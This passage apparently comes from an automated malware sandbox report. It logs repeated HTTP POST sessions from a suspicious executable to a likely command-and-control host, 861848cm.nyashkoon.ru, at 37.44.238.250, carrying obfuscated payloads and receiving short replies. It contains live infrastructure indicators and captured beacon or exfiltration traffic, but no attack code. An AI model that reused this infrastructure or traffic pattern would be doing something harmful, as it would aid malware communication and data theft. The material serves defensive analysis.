                                                                                            Data Ascii: \<$;(.=^(3\82$Z>8Y*^0R7?("T6 $(!_900W=2!=7+1V?*+6X \52>&&/Q?9%**W#$8(2/Z$-=%*$*<# 9)#<6'&Z0:%<(&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            60192.168.2.44993337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:26.026117086 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:26.383626938 CET1024OUTData Raw: 56 50 5f 59 56 5d 50 52 5a 5f 52 51 54 5e 5b 5a 55 51 59 58 51 5f 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VP_YV]PRZ_RQT^[ZUQYXQ_RSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8%<(7(*=.&]0(<Z +-+Z.$]#"\1'X$.Q-6
                                                                                            Nov 5, 2024 23:53:27.027290106 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:27.027825117 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:27.027987003 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            61192.168.2.44994037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:27.162604094 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:27.508645058 CET1024OUTData Raw: 56 52 5a 5d 56 5c 55 5d 5a 5f 52 51 54 5e 5b 5d 55 50 59 5e 51 55 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ]V\U]Z_RQT^[]UPY^QURXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,Y1?<U$\=9>>>"[$$[#>)>$9%_7%'X$.Q-6
                                                                                            Nov 5, 2024 23:53:27.974730015 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:28.050991058 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            62192.168.2.44994637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:28.514350891 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:28.868041039 CET1024OUTData Raw: 56 51 5a 5f 53 5d 55 5a 5a 5f 52 51 54 59 5b 5e 55 5d 59 58 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZ_S]UZZ_RQTY[^U]YXQQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;"R=;4\+#)))>_37 ?.U+7X9%#!'9'9'X$.Q-*
                                                                                            Nov 5, 2024 23:53:29.325799942 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:29.401865959 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            63192.168.2.44995537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:29.528367043 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:29.883605957 CET1024OUTData Raw: 56 57 5a 5a 56 56 55 5d 5a 5f 52 51 54 5f 5b 5a 55 56 59 5e 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZZVVU]Z_RQT_[ZUVY^QUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,/"<8 _([**=X)Z0+8#1+-/Y,6 77*_1'X$.Q-2
                                                                                            Nov 5, 2024 23:53:31.334186077 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:31.334752083 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:31.335114956 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:31.335192919 CET183INHTTP/1.1 100 Continue
                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 32 32 3a 35 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 32 56 59 50
                                                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 22:53:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive2VYP
                                                                                            Nov 5, 2024 23:53:31.335648060 CET183INHTTP/1.1 100 Continue
                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 32 32 3a 35 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 32 56 59 50
                                                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 22:53:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            64192.168.2.44996137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:31.496860027 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:31.852349043 CET1024OUTData Raw: 53 54 5f 58 53 58 55 5e 5a 5f 52 51 54 53 5b 5b 55 56 59 57 51 50 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_XSXU^Z_RQTS[[UVYWQPR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;1(;??(X>:2*!$+ 4?>U?4.^#1'X$.Q-
                                                                                            Nov 5, 2024 23:53:32.311724901 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:32.385070086 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            65192.168.2.44996237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:31.550164938 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:31.899218082 CET1284OUTData Raw: 53 52 5a 55 56 57 50 5d 5a 5f 52 51 54 5f 5b 59 55 5c 59 5f 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZUVWP]Z_RQT_[YU\Y_QRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8?&W<(8X+34[=:&?->\38 _#Y>?0-0X4-2)'X$.Q-2
                                                                                            Nov 5, 2024 23:53:32.360049963 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            66192.168.2.44997137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:32.511348963 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:32.868091106 CET1024OUTData Raw: 56 54 5a 5a 56 5c 50 5a 5a 5f 52 51 54 53 5b 5c 55 5c 59 57 51 5f 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VTZZV\PZZ_RQTS[\U\YWQ_R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,Y*?8;+3(*)>*>>38 <-<-,-&'#'%9'X$.Q-
                                                                                            Nov 5, 2024 23:53:33.322463036 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:33.392414093 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            67192.168.2.44997537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:33.572199106 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:33.931773901 CET1024OUTData Raw: 53 56 5a 5f 53 5c 50 5a 5a 5f 52 51 54 53 5b 5b 55 55 59 5d 51 50 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZ_S\PZZ_RQTS[[UUY]QPRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X;1=8<U+)=_>)0? :?=3.6<#7>^'9'X$.Q-
                                                                                            Nov 5, 2024 23:53:34.384871006 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:34.457220078 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            68192.168.2.44998137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:34.630588055 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:34.978374958 CET1024OUTData Raw: 56 53 5f 58 56 57 55 59 5a 5f 52 51 54 5b 5b 59 55 54 59 57 51 55 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_XVWUYZ_RQT[[YUTYWQURSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,<"S<+((*1>.*[344%+=<9534'^&'X$.Q-"
                                                                                            Nov 5, 2024 23:53:35.441690922 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:35.511781931 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            69192.168.2.44998637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:35.837266922 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:36.196834087 CET1024OUTData Raw: 53 55 5a 5e 56 5f 50 52 5a 5f 52 51 54 5d 5b 5c 55 50 59 5f 51 57 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ^V_PRZ_RQT][\UPY_QWR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;<!=8$<8=:5_):Z$<X (?:0\#$!19'X$.Q-
                                                                                            Nov 5, 2024 23:53:36.832134008 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:36.832220078 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:36.832454920 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            70192.168.2.44998937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:36.970132113 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.321204901 CET1024OUTData Raw: 56 57 5a 5f 56 58 50 53 5a 5f 52 51 54 59 5b 5f 55 5d 59 58 51 55 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZ_VXPSZ_RQTY[_U]YXQUR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?%<80_?'>6>[&%(?"/<.<,5,4$2\&9'X$.Q-*


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            71192.168.2.44999437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:37.432349920 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.790030003 CET1284OUTData Raw: 53 54 5a 5c 56 5f 50 5f 5a 5f 52 51 54 5e 5b 5a 55 5c 59 59 51 5f 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ\V_P_Z_RQT^[ZU\YYQ_R^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,&=+8]?<*:Y=[>]%('#?)=0.&,Y#Q1%9'X$.Q-6
                                                                                            Nov 5, 2024 23:53:38.251769066 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:38.323584080 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 59 2b 2a 32 59 33 38 38 16 2a 10 25 5b 29 23 33 17 2f 21 37 03 3e 30 23 01 3d 16 0e 53 37 01 33 1a 22 22 3d 1e 23 32 3f 1d 28 01 21 5f 05 1d 39 58 33 3a 30 57 2a 32 04 1b 2a 37 34 40 26 30 0a 45 2a 3b 35 01 37 04 29 0d 32 3e 39 11 25 22 37 50 3f 24 21 5c 3a 11 3f 12 25 3a 2a 57 09 16 20 55 24 20 2c 00 29 32 30 06 30 3e 2a 00 31 04 24 0c 2a 02 23 58 34 1a 29 06 3e 0d 2b 12 35 19 00 5d 24 14 32 40 24 3e 2f 1b 3f 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: Y+*2Y388*%[)#3/!7>0#=S73""=#2?(!_9X3:0W*2*74@&0E*;57)2>9%"7P?$!\:?%:*W U$ ,)200>*1$*#X4)>+5]$2@$>/?&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            72192.168.2.44999537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:37.562148094 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
